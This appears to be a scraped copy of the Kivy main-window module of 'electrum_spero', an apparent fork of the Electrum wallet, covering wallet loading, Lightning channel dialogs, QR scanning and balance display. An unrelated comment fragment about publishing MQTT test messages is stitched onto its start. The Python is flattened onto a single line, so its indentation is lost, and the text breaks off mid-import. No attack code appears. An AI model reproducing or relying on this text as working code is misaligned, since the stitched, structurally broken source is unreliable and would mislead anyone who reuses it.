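# processMessage(); the values are made up. Payloads are sent as Python dict
# literals because the viewer decodes them with ast.literal_eval().
#
#   import paho.mqtt.client as mqtt
#
#   pub = mqtt.Client()
#   pub.connect("127.0.0.1", 1883)
#   msg = {"t": "2021-06-01 12:00:00", "op": "create",
#          "data": {"kind": "item", "itemid": "item-0001", "result": 0}}
#   pub.publish("AS/R", str(msg), qos=1)  # rendered green/blue because result == 0
#   msg["data"]["result"] = 9001
#   pub.publish("AS/R", str(msg), qos=1)  # rendered red/yellow (error code 9001)
#   pub.disconnect()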
main_window.py
import re import os import sys import time import datetime import traceback from decimal import Decimal import threading import asyncio from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence from electrum_spero.storage import WalletStorage, StorageReadWriteError from electrum_spero.wallet_db import WalletDB from electrum_spero.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet from electrum_spero.wallet import check_password_for_directory, update_password_for_directory from electrum_spero.plugin import run_hook from electrum_spero import util from electrum_spero.util import (profiler, InvalidPassword, send_exception_to_crash_reporter, format_satoshis, format_satoshis_plain, format_fee_satoshis, maybe_extract_bolt11_invoice) from electrum_spero.invoices import PR_PAID, PR_FAILED from electrum_spero import blockchain from electrum_spero.network import Network, TxBroadcastError, BestEffortRequestFailed from electrum_spero.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr from electrum_spero.logging import Logger from electrum_spero.gui import messages from .i18n import _ from . import KIVY_GUI_PATH from kivy.app import App from kivy.core.window import Window from kivy.utils import platform from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty, StringProperty, ListProperty, BooleanProperty, NumericProperty) from kivy.cache import Cache from kivy.clock import Clock from kivy.factory import Factory from kivy.metrics import inch from kivy.lang import Builder from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog from .uix.dialogs.choice_dialog import ChoiceDialog ## lazy imports for factory so that widgets can be used in kv #Factory.register('InstallWizard', module='electrum_spero.gui.kivy.uix.dialogs.installwizard') #Factory.register('InfoBubble', module='electrum_spero.gui.kivy.uix.dialogs') #Factory.register('OutputList', module='electrum_spero.gui.kivy.uix.dialogs') #Factory.register('OutputItem', module='electrum_spero.gui.kivy.uix.dialogs') from .uix.dialogs.installwizard import InstallWizard from .uix.dialogs import InfoBubble, crash_reporter from .uix.dialogs import OutputList, OutputItem from .uix.dialogs import TopLabel, RefLabel from .uix.dialogs.question import Question #from kivy.core.window import Window #Window.softinput_mode = 'below_target' # delayed imports: for startup speed on android notification = app = ref = None # register widget cache for keeping memory down timeout to forever to cache # the data Cache.register('electrum_spero_widgets', timeout=0) from kivy.uix.screenmanager import Screen from kivy.uix.tabbedpanel import TabbedPanel from kivy.uix.label import Label from kivy.core.clipboard import Clipboard Factory.register('TabbedCarousel', module='electrum_spero.gui.kivy.uix.screens') # Register fonts without this you won't be able to use bold/italic... # inside markup. from kivy.core.text import Label Label.register( 'Roboto', KIVY_GUI_PATH + '/data/fonts/Roboto.ttf', KIVY_GUI_PATH + '/data/fonts/Roboto.ttf', KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf', KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf', ) from electrum_spero.util import (NoDynamicFeeEstimates, NotEnoughFunds, BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME, UserFacingException) from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog if TYPE_CHECKING: from . 
import ElectrumGui from electrum_spero.simple_config import SimpleConfig from electrum_spero.plugin import Plugins from electrum_spero.paymentrequest import PaymentRequest class ElectrumWindow(App, Logger): electrum_config = ObjectProperty(None) language = StringProperty('en') # properties might be updated by the network num_blocks = NumericProperty(0) num_nodes = NumericProperty(0) server_host = StringProperty('') server_port = StringProperty('') num_chains = NumericProperty(0) blockchain_name = StringProperty('') fee_status = StringProperty('Fee') balance = StringProperty('') fiat_balance = StringProperty('') is_fiat = BooleanProperty(False) blockchain_forkpoint = NumericProperty(0) lightning_gossip_num_peers = NumericProperty(0) lightning_gossip_num_nodes = NumericProperty(0) lightning_gossip_num_channels = NumericProperty(0) lightning_gossip_num_queries = NumericProperty(0) auto_connect = BooleanProperty(False) def on_auto_connect(self, instance, x): net_params = self.network.get_parameters() net_params = net_params._replace(auto_connect=self.auto_connect) self.network.run_from_another_thread(self.network.set_parameters(net_params)) def toggle_auto_connect(self, x): self.auto_connect = not self.auto_connect oneserver = BooleanProperty(False) def on_oneserver(self, instance, x): net_params = self.network.get_parameters() net_params = net_params._replace(oneserver=self.oneserver) self.network.run_from_another_thread(self.network.set_parameters(net_params)) def toggle_oneserver(self, x): self.oneserver = not self.oneserver proxy_str = StringProperty('') def update_proxy_str(self, proxy: dict): mode = proxy.get('mode') host = proxy.get('host') port = proxy.get('port') self.proxy_str = (host + ':' + port) if mode else _('None') def choose_server_dialog(self, popup): protocol = PREFERRED_NETWORK_PROTOCOL def cb2(server_str): popup.ids.server_str.text = server_str servers = self.network.get_servers() server_choices = {} for _host, d in sorted(servers.items()): port = d.get(protocol) if port: server = ServerAddr(_host, port, protocol=protocol) server_choices[server.net_addr_str()] = _host ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open() def maybe_switch_to_server(self, server_str: str): net_params = self.network.get_parameters() try: server = ServerAddr.from_str_with_inference(server_str) if not server: raise Exception("failed to parse") except Exception as e: self.show_error(_("Invalid server details: {}").format(repr(e))) return net_params = net_params._replace(server=server) self.network.run_from_another_thread(self.network.set_parameters(net_params)) def choose_blockchain_dialog(self, dt): chains = self.network.get_blockchains() def cb(name): with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items()) for chain_id, b in blockchain_items: if name == b.get_name(): self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id)) chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains] chain_objects = filter(lambda b: b is not None, chain_objects) names = [b.get_name() for b in chain_objects] if len(names) > 1: cur_chain = self.network.blockchain().get_name() ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open() use_rbf = BooleanProperty(False) def on_use_rbf(self, instance, x): self.electrum_config.set_key('use_rbf', self.use_rbf, True) use_gossip = BooleanProperty(False) def on_use_gossip(self, instance, x): self.electrum_config.set_key('use_gossip', self.use_gossip, 
True) if self.network: if self.use_gossip: self.network.start_gossip() else: self.network.run_from_another_thread( self.network.stop_gossip()) use_change = BooleanProperty(False) def on_use_change(self, instance, x): if self.wallet: self.wallet.use_change = self.use_change self.wallet.db.put('use_change', self.use_change) self.wallet.save_db() use_unconfirmed = BooleanProperty(False) def on_use_unconfirmed(self, instance, x): self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True) use_recoverable_channels = BooleanProperty(True) def on_use_recoverable_channels(self, instance, x): self.electrum_config.set_key('use_recoverable_channels', self.use_recoverable_channels, True) def switch_to_send_screen(func): # try until send_screen is available def wrapper(self, *args): f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True Clock.schedule_interval(f, 0.1) return wrapper @switch_to_send_screen def set_URI(self, uri): self.send_screen.set_URI(uri) @switch_to_send_screen def set_ln_invoice(self, invoice): self.send_screen.set_ln_invoice(invoice) def on_new_intent(self, intent): data = str(intent.getDataString()) scheme = str(intent.getScheme()).lower() if scheme == BITCOIN_BIP21_URI_SCHEME: self.set_URI(data) elif scheme == LIGHTNING_URI_SCHEME: self.set_ln_invoice(data) def on_language(self, instance, language): self.logger.info('language: {}'.format(language)) _.switch_lang(language) def update_history(self, *dt): if self.history_screen: self.history_screen.update() def on_quotes(self, d): self.logger.info("on_quotes") self._trigger_update_status() self._trigger_update_history() def on_history(self, d): self.logger.info("on_history") if self.wallet: self.wallet.clear_coin_price_cache() self._trigger_update_history() def on_fee_histogram(self, *args): self._trigger_update_history() def on_request_status(self, event, wallet, key, status): req = self.wallet.receive_requests.get(key) if req is None: return if self.receive_screen: if status == PR_PAID: self.receive_screen.update() else: self.receive_screen.update_item(key, req) if self.request_popup and self.request_popup.key == key: self.request_popup.update_status() if status == PR_PAID: self.show_info(_('Payment Received') + '\n' + key) self._trigger_update_history() def on_invoice_status(self, event, wallet, key): req = self.wallet.get_invoice(key) if req is None: return status = self.wallet.get_invoice_status(req) if self.send_screen: if status == PR_PAID: self.send_screen.update() else: self.send_screen.update_item(key, req) if self.invoice_popup and self.invoice_popup.key == key: self.invoice_popup.update_status() def on_payment_succeeded(self, event, wallet, key): description = self.wallet.get_label(key) self.show_info(_('Payment succeeded') + '\n\n' + description) self._trigger_update_history() def on_payment_failed(self, event, wallet, key, reason): self.show_info(_('Payment failed') + '\n\n' + reason) def _get_bu(self): return self.electrum_config.get_base_unit() def _set_bu(self, value): self.electrum_config.set_base_unit(value) self._trigger_update_status() self._trigger_update_history() wallet_name = StringProperty(_('No Wallet')) base_unit = AliasProperty(_get_bu, _set_bu) fiat_unit = StringProperty('') def on_fiat_unit(self, a, b): self._trigger_update_history() def decimal_point(self): return self.electrum_config.get_decimal_point() def btc_to_fiat(self, amount_str): if not amount_str: return '' if not self.fx.is_enabled(): 
return '' rate = self.fx.exchange_rate() if rate.is_nan(): return '' fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8) return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.') def fiat_to_btc(self, fiat_amount): if not fiat_amount: return '' rate = self.fx.exchange_rate() if rate.is_nan(): return '' satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate)) return format_satoshis_plain(satoshis, decimal_point=self.decimal_point()) def get_amount(self, amount_str): a, u = amount_str.split() assert u == self.base_unit try: x = Decimal(a) except: return None p = pow(10, self.decimal_point()) return int(p * x) _orientation = OptionProperty('landscape', options=('landscape', 'portrait')) def _get_orientation(self): return self._orientation orientation = AliasProperty(_get_orientation, None, bind=('_orientation',)) '''Tries to ascertain the kind of device the app is running on. Cane be one of `tablet` or `phone`. :data:`orientation` is a read only `AliasProperty` Defaults to 'landscape' ''' _ui_mode = OptionProperty('phone', options=('tablet', 'phone')) def _get_ui_mode(self): return self._ui_mode ui_mode = AliasProperty(_get_ui_mode, None, bind=('_ui_mode',)) '''Defines tries to ascertain the kind of device the app is running on. Cane be one of `tablet` or `phone`. :data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone' ''' def __init__(self, **kwargs): # initialize variables self._clipboard = Clipboard self.info_bubble = None self.nfcscanner = None self.tabs = None self.is_exit = False self.wallet = None # type: Optional[Abstract_Wallet] self.pause_time = 0 self.asyncio_loop = asyncio.get_event_loop() self.password = None self._use_single_password = False self.resume_dialog = None App.__init__(self)#, **kwargs) Logger.__init__(self) self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig self.language = config.get('language', 'en') self.network = network = kwargs.get('network', None) # type: Network if self.network: self.num_blocks = self.network.get_local_height() self.num_nodes = len(self.network.get_interfaces()) net_params = self.network.get_parameters() self.server_host = net_params.server.host self.server_port = str(net_params.server.port) self.auto_connect = net_params.auto_connect self.oneserver = net_params.oneserver self.proxy_config = net_params.proxy if net_params.proxy else {} self.update_proxy_str(self.proxy_config) self.plugins = kwargs.get('plugins', None) # type: Plugins self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui self.daemon = self.gui_object.daemon self.fx = self.daemon.fx self.use_rbf = config.get('use_rbf', True) self.use_gossip = config.get('use_gossip', False) self.use_unconfirmed = not config.get('confirmed_only', False) # create triggers so as to minimize updating a max of 2 times a sec self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5) self._trigger_update_status = Clock.create_trigger(self.update_status, .5) self._trigger_update_history = Clock.create_trigger(self.update_history, .5) self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5) self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5) # cached dialogs self._settings_dialog = None self._channels_dialog = None self._addresses_dialog = None self.set_fee_status() self.invoice_popup = None self.request_popup = None def on_pr(self, pr: 'PaymentRequest'): if not self.wallet: self.show_error(_('No wallet 
loaded.')) return if pr.verify(self.wallet.contacts): key = pr.get_id() invoice = self.wallet.get_invoice(key) # FIXME wrong key... if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID: self.show_error("invoice already paid") self.send_screen.do_clear() elif pr.has_expired(): self.show_error(_('Payment request has expired')) else: self.switch_to('send') self.send_screen.set_request(pr) else: self.show_error("invoice error:" + pr.error) self.send_screen.do_clear() def on_qr(self, data): from electrum_spero.bitcoin import is_address data = data.strip() if is_address(data): self.set_URI(data) return if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'): self.set_URI(data) return if data.lower().startswith('channel_backup:'): self.import_channel_backup(data) return bolt11_invoice = maybe_extract_bolt11_invoice(data) if bolt11_invoice is not None: self.set_ln_invoice(bolt11_invoice) return # try to decode transaction from electrum_spero.transaction import tx_from_any try: tx = tx_from_any(data) except: tx = None if tx: self.tx_dialog(tx) return # show error self.show_error("Unable to decode QR data") def update_tab(self, name): s = getattr(self, name + '_screen', None) if s: s.update() @profiler def update_tabs(self): for name in ['send', 'history', 'receive']: self.update_tab(name) def switch_to(self, name): s = getattr(self, name + '_screen', None) panel = self.tabs.ids.panel tab = self.tabs.ids[name + '_tab'] panel.switch_to(tab) def show_request(self, is_lightning, key): from .uix.dialogs.request_dialog import RequestDialog self.request_popup = RequestDialog('Request', key) self.request_popup.open() def show_invoice(self, is_lightning, key): from .uix.dialogs.invoice_dialog import InvoiceDialog invoice = self.wallet.get_invoice(key) if not invoice: return data = invoice.invoice if is_lightning else key self.invoice_popup = InvoiceDialog('Invoice', data, key) self.invoice_popup.open() def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None): from .uix.dialogs.qr_dialog import QRDialog def on_qr_failure(): popup.dismiss() msg = _('Failed to display QR code.') if text_for_clipboard: msg += '\n' + _('Text copied to clipboard.') self._clipboard.copy(text_for_clipboard) Clock.schedule_once(lambda dt: self.show_info(msg)) popup = QRDialog( title, data, show_text, failure_cb=on_qr_failure, text_for_clipboard=text_for_clipboard, help_text=help_text) popup.open() def scan_qr(self, on_complete): if platform != 'android': return self.scan_qr_non_android(on_complete) from jnius import autoclass, cast from android import activity PythonActivity = autoclass('org.kivy.android.PythonActivity') SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity") Intent = autoclass('android.content.Intent') intent = Intent(PythonActivity.mActivity, SimpleScannerActivity) def on_qr_result(requestCode, resultCode, intent): try: if resultCode == -1: # RESULT_OK: # this doesn't work due to some bug in jnius: # contents = intent.getStringExtra("text") String = autoclass("java.lang.String") contents = intent.getStringExtra(String("text")) on_complete(contents) except Exception as e: # exc would otherwise get lost send_exception_to_crash_reporter(e) finally: activity.unbind(on_activity_result=on_qr_result) activity.bind(on_activity_result=on_qr_result) PythonActivity.mActivity.startActivityForResult(intent, 0) def scan_qr_non_android(self, on_complete): from electrum_spero import qrscanner try: video_dev = self.electrum_config.get_video_device() data = 
qrscanner.scan_barcode(video_dev) on_complete(data) except UserFacingException as e: self.show_error(e) except BaseException as e: self.logger.exception('camera error') self.show_error(repr(e)) def do_share(self, data, title): if platform != 'android': return from jnius import autoclass, cast JS = autoclass('java.lang.String') Intent = autoclass('android.content.Intent') sendIntent = Intent() sendIntent.setAction(Intent.ACTION_SEND) sendIntent.setType("text/plain") sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data)) PythonActivity = autoclass('org.kivy.android.PythonActivity') currentActivity = cast('android.app.Activity', PythonActivity.mActivity) it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title))) currentActivity.startActivity(it) def build(self): return Builder.load_file(KIVY_GUI_PATH + '/main.kv') def _pause(self): if platform == 'android': # move activity to back from jnius import autoclass python_act = autoclass('org.kivy.android.PythonActivity') mActivity = python_act.mActivity mActivity.moveTaskToBack(True) def handle_crash_on_startup(func): def wrapper(self, *args, **kwargs): try: return func(self, *args, **kwargs) except Exception as e: self.logger.exception('crash on startup') from .uix.dialogs.crash_reporter import CrashReporter # show the crash reporter, and when it's closed, shutdown the app cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__) cr.on_dismiss = lambda: self.stop() Clock.schedule_once(lambda _, cr=cr: cr.open(), 0) return wrapper @handle_crash_on_startup def on_start(self): ''' This is the start point of the kivy ui ''' import time self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time())) Window.bind(size=self.on_size, on_keyboard=self.on_keyboard) #Window.softinput_mode = 'below_target' self.on_size(Window, Window.size) self.init_ui() crash_reporter.ExceptionHook(self) # init plugins run_hook('init_kivy', self) # fiat currency self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else '' # default tab self.switch_to('history') # bind intent for bitcoin: URI scheme if platform == 'android': from android import activity from jnius import autoclass PythonActivity = autoclass('org.kivy.android.PythonActivity') mactivity = PythonActivity.mActivity self.on_new_intent(mactivity.getIntent()) activity.bind(on_new_intent=self.on_new_intent) # connect callbacks if self.network: interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'status', 'new_transaction', 'verified'] util.register_callback(self.on_network_event, interests) util.register_callback(self.on_fee, ['fee']) util.register_callback(self.on_fee_histogram, ['fee_histogram']) util.register_callback(self.on_quotes, ['on_quotes']) util.register_callback(self.on_history, ['on_history']) util.register_callback(self.on_channels, ['channels_updated']) util.register_callback(self.on_channel, ['channel']) util.register_callback(self.on_invoice_status, ['invoice_status']) util.register_callback(self.on_request_status, ['request_status']) util.register_callback(self.on_payment_failed, ['payment_failed']) util.register_callback(self.on_payment_succeeded, ['payment_succeeded']) util.register_callback(self.on_channel_db, ['channel_db']) util.register_callback(self.set_num_peers, ['gossip_peers']) util.register_callback(self.set_unknown_channels, ['unknown_channels']) # load wallet self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True)) # URI passed in config uri = self.electrum_config.get('url') if uri: 
self.set_URI(uri) def on_channel_db(self, event, num_nodes, num_channels, num_policies): self.lightning_gossip_num_nodes = num_nodes self.lightning_gossip_num_channels = num_channels def set_num_peers(self, event, num_peers): self.lightning_gossip_num_peers = num_peers def set_unknown_channels(self, event, unknown): self.lightning_gossip_num_queries = unknown def get_wallet_path(self): if self.wallet: return self.wallet.storage.path else: return '' def on_wizard_success(self, storage, db, password): self.password = password if self.electrum_config.get('single_password'): self._use_single_password = update_password_for_directory(self.electrum_config, password, password) self.logger.info(f'use single password: {self._use_single_password}') wallet = Wallet(db, storage, config=self.electrum_config) wallet.start_network(self.daemon.network) self.daemon.add_wallet(wallet) self.load_wallet(wallet) def on_wizard_aborted(self): # wizard did not return a wallet; and there is no wallet open atm if not self.wallet: self.stop() def load_wallet_by_name(self, path): if not path: return if self.wallet and self.wallet.storage.path == path: return if self.password and self._use_single_password: storage = WalletStorage(path) # call check_password to decrypt storage.check_password(self.password) self.on_open_wallet(self.password, storage) return d = OpenWalletDialog(self, path, self.on_open_wallet) d.open() def on_open_wallet(self, password, storage): if not storage.file_exists(): wizard = InstallWizard(self.electrum_config, self.plugins) wizard.path = storage.path wizard.run('new') else: assert storage.is_past_initial_decryption() db = WalletDB(storage.read(), manual_upgrades=False) assert not db.requires_upgrade() self.on_wizard_success(storage, db, password) def on_stop(self): self.logger.info('on_stop') self.stop_wallet() def stop_wallet(self): if self.wallet: self.daemon.stop_wallet(self.wallet.storage.path) self.wallet = None def on_keyboard(self, instance, key, keycode, codepoint, modifiers): if key == 27 and self.is_exit is False: self.is_exit = True self.show_info(_('Press again to exit')) return True # override settings button if key in (319, 282): #f1/settings button on android #self.gui.main_gui.toggle_settings(self) return True def settings_dialog(self): from .uix.dialogs.settings import SettingsDialog if self._settings_dialog is None: self._settings_dialog = SettingsDialog(self) self._settings_dialog.update() self._settings_dialog.open() def lightning_open_channel_dialog(self): if not self.wallet.has_lightning(): self.show_error(_('Lightning is not enabled for this wallet')) return if not self.wallet.lnworker.channels and not self.wallet.lnworker.channel_backups: warning = _(messages.MSG_LIGHTNING_WARNING) d = Question(_('Do you want to create your first channel?') + '\n\n' + warning, self.open_channel_dialog_with_warning) d.open() else: d = LightningOpenChannelDialog(self) d.open() def swap_dialog(self): d = SwapDialog(self, self.electrum_config) d.open() def open_channel_dialog_with_warning(self, b): if b: d = LightningOpenChannelDialog(self) d.open() def lightning_channels_dialog(self): if self._channels_dialog is None: self._channels_dialog = LightningChannelsDialog(self) self._channels_dialog.open() def on_channel(self, evt, wallet, chan): if self._channels_dialog: Clock.schedule_once(lambda dt: self._channels_dialog.update()) def on_channels(self, evt, wallet): if self._channels_dialog: Clock.schedule_once(lambda dt: self._channels_dialog.update()) def is_wallet_creation_disabled(self): 
return bool(self.electrum_config.get('single_password')) and self.password is None def wallets_dialog(self): from .uix.dialogs.wallets import WalletDialog dirname = os.path.dirname(self.electrum_config.get_wallet_path()) d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled()) d.open() def popup_dialog(self, name): if name == 'settings': self.settings_dialog() elif name == 'wallets': self.wallets_dialog() elif name == 'status': popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv') master_public_keys_layout = popup.ids.master_public_keys for xpub in self.wallet.get_master_public_keys()[1:]: master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key'))) ref = RefLabel() ref.name = _('Master Public Key') ref.data = xpub master_public_keys_layout.add_widget(ref) popup.open() elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning(): self.show_error(_("Not available for this wallet.") + "\n\n" + _("Lightning is currently restricted to HD wallets with p2wpkh addresses.")) elif name.endswith("_dialog"): getattr(self, name)() else: popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv') popup.open() @profiler def init_ui(self): ''' Initialize The Ux part of electrum. This function performs the basic tasks of setting up the ui. ''' #from weakref import ref self.funds_error = False # setup UX self.screens = {} #setup lazy imports for mainscreen Factory.register('AnimatedPopup', module='electrum_spero.gui.kivy.uix.dialogs') Factory.register('QRCodeWidget', module='electrum_spero.gui.kivy.uix.qrcodewidget') # preload widgets. Remove this if you want to load the widgets on demand #Cache.append('electrum_spero_widgets', 'AnimatedPopup', Factory.AnimatedPopup()) #Cache.append('electrum_spero_widgets', 'QRCodeWidget', Factory.QRCodeWidget()) # load and focus the ui self.root.manager = self.root.ids['manager'] self.history_screen = None self.send_screen = None self.receive_screen = None self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-spero.png" self.tabs = self.root.ids['tabs'] def update_interfaces(self, dt): net_params = self.network.get_parameters() self.num_nodes = len(self.network.get_interfaces()) self.num_chains = len(self.network.get_blockchains()) chain = self.network.blockchain() self.blockchain_forkpoint = chain.get_max_forkpoint() self.blockchain_name = chain.get_name() interface = self.network.interface if interface: self.server_host = interface.host else: self.server_host = str(net_params.server.host) + ' (connecting...)' self.proxy_config = net_params.proxy or {} self.update_proxy_str(self.proxy_config) def on_network_event(self, event, *args): self.logger.info('network event: '+ event) if event == 'network_updated': self._trigger_update_interfaces() self._trigger_update_status() elif event == 'wallet_updated': self._trigger_update_wallet() self._trigger_update_status() elif event == 'blockchain_updated': # to update number of confirmations in history self._trigger_update_wallet() elif event == 'status': self._trigger_update_status() elif event == 'new_transaction': self._trigger_update_wallet() elif event == 'verified': self._trigger_update_wallet() @profiler def load_wallet(self, wallet: 'Abstract_Wallet'): if self.wallet: self.stop_wallet() self.wallet = wallet self.wallet_name = wallet.basename() self.update_wallet() # Once GUI has been initialized check if we want to announce something # since the callback has been called before the GUI was initialized if 
self.receive_screen: self.receive_screen.clear() self.update_tabs() run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) return self.use_change = self.wallet.use_change self.electrum_config.save_last_wallet(wallet) self.request_focus_for_main_view() def request_focus_for_main_view(self): if platform != 'android': return # The main view of the activity might be not have focus # in which case e.g. the OS "back" button would not work. # see #6276 (specifically "method 2" and "method 3") from jnius import autoclass PythonActivity = autoclass('org.kivy.android.PythonActivity') PythonActivity.requestFocusForMainView() def update_status(self, *dt): if not self.wallet: return if self.network is None or not self.network.is_connected(): status = _("Offline") elif self.network.is_connected(): self.num_blocks = self.network.get_local_height() server_height = self.network.get_server_height() server_lag = self.num_blocks - server_height if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() status = ("{} [size=18dp]({}/{})[/size]" .format(_("Synchronizing..."), num_answered, num_sent)) elif server_lag > 1: status = _("Server is lagging ({} blocks)").format(server_lag) else: status = '' else: status = _("Disconnected") if status: self.balance = status self.fiat_balance = status else: c, u, x = self.wallet.get_balance() l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0 balance_sat = c + u + x + l text = self.format_amount(balance_sat) self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy def update_wallet_synchronizing_progress(self, *dt): if not self.wallet: return if not self.wallet.up_to_date: self._trigger_update_status() def get_max_amount(self): from electrum_spero.transaction import PartialTxOutput if run_hook('abort_send', self): return '' inputs = self.wallet.get_spendable_coins(None) if not inputs: return '' addr = None if self.send_screen: addr = str(self.send_screen.address) if not addr: addr = self.wallet.dummy_address() outputs = [PartialTxOutput.from_address_and_value(addr, '!')] try: tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs) except NoDynamicFeeEstimates as e: Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e))) return '' except NotEnoughFunds: return '' except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) return '' amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point()) def format_amount(self, x, is_diff=False, whitespaces=False): return format_satoshis( x, num_zeros=0, decimal_point=self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces, ) def format_amount_and_units(self, x) -> str: if x is None: return 'none' if x == '!': return 'max' return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit def format_fee_rate(self, fee_rate): # fee_rate is in sat/kB return format_fee_satoshis(fee_rate/1000) + ' spr/byte' #@profiler def update_wallet(self, *dt): self._trigger_update_status() if self.wallet and (self.wallet.up_to_date or not 
self.network or not self.network.is_connected()): self.update_tabs() def notify(self, message): try: global notification, os if not notification: from plyer import notification icon = (os.path.dirname(os.path.realpath(__file__)) + '/../../' + self.icon) notification.notify('electrum-spero', message, app_icon=icon, app_name='electrum-spero') except ImportError: self.logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`') def on_pause(self): self.pause_time = time.time() # pause nfc if self.nfcscanner: self.nfcscanner.nfc_disable() return True def on_resume(self): if self.nfcscanner: self.nfcscanner.nfc_enable() if self.resume_dialog is not None: return now = time.time() if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60: def on_success(x): self.resume_dialog = None d = PincodeDialog( self, check_password=self.check_pin_code, on_success=on_success, on_failure=self.stop) self.resume_dialog = d d.open() def on_size(self, instance, value): width, height = value self._orientation = 'landscape' if width > height else 'portrait' self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone' def on_ref_label(self, label, *, show_text_with_qr: bool = True): if not label.data: return self.qr_dialog(label.name, label.data, show_text_with_qr) def show_error(self, error, width='200dp', pos=None, arrow_pos=None, exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0, modal=False): ''' Show an error Message Bubble. ''' self.show_info_bubble(text=error, icon=icon, width=width, pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit, duration=duration, modal=modal) def show_info(self, error, width='200dp', pos=None, arrow_pos=None, exit=False, duration=0, modal=False): ''' Show an Info Message Bubble. ''' self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important', duration=duration, modal=modal, exit=exit, pos=pos, arrow_pos=arrow_pos) def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0, arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False): '''Method to show an Information Bubble .. parameters:: text: Message to be displayed pos: position for the bubble duration: duration the bubble remains on screen. 0 = click to hide width: width of the Bubble arrow_pos: arrow position for the bubble ''' text = str(text) # so that we also handle e.g. 
Exception info_bubble = self.info_bubble if not info_bubble: info_bubble = self.info_bubble = Factory.InfoBubble() win = Window if info_bubble.parent: win.remove_widget(info_bubble if not info_bubble.modal else info_bubble._modal_view) if not arrow_pos: info_bubble.show_arrow = False else: info_bubble.show_arrow = True info_bubble.arrow_pos = arrow_pos img = info_bubble.ids.img if text == 'texture': # icon holds a texture not a source image # display the texture in full screen text = '' img.texture = icon info_bubble.fs = True info_bubble.show_arrow = False img.allow_stretch = True info_bubble.dim_background = True info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card' else: info_bubble.fs = False info_bubble.icon = icon #if img.texture and img._coreimage: # img.reload() img.allow_stretch = False info_bubble.dim_background = False info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble' info_bubble.message = text if not pos: pos = (win.center[0], win.center[1] - (info_bubble.height/2)) info_bubble.show(pos, duration, width, modal=modal, exit=exit) def tx_dialog(self, tx): from .uix.dialogs.tx_dialog import TxDialog d = TxDialog(self, tx) d.open() def show_transaction(self, txid): tx = self.wallet.db.get_transaction(txid) if not tx and self.wallet.lnworker: tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid) if tx: self.tx_dialog(tx) else: self.show_error(f'Transaction not found {txid}') def lightning_tx_dialog(self, tx): from .uix.dialogs.lightning_tx_dialog import 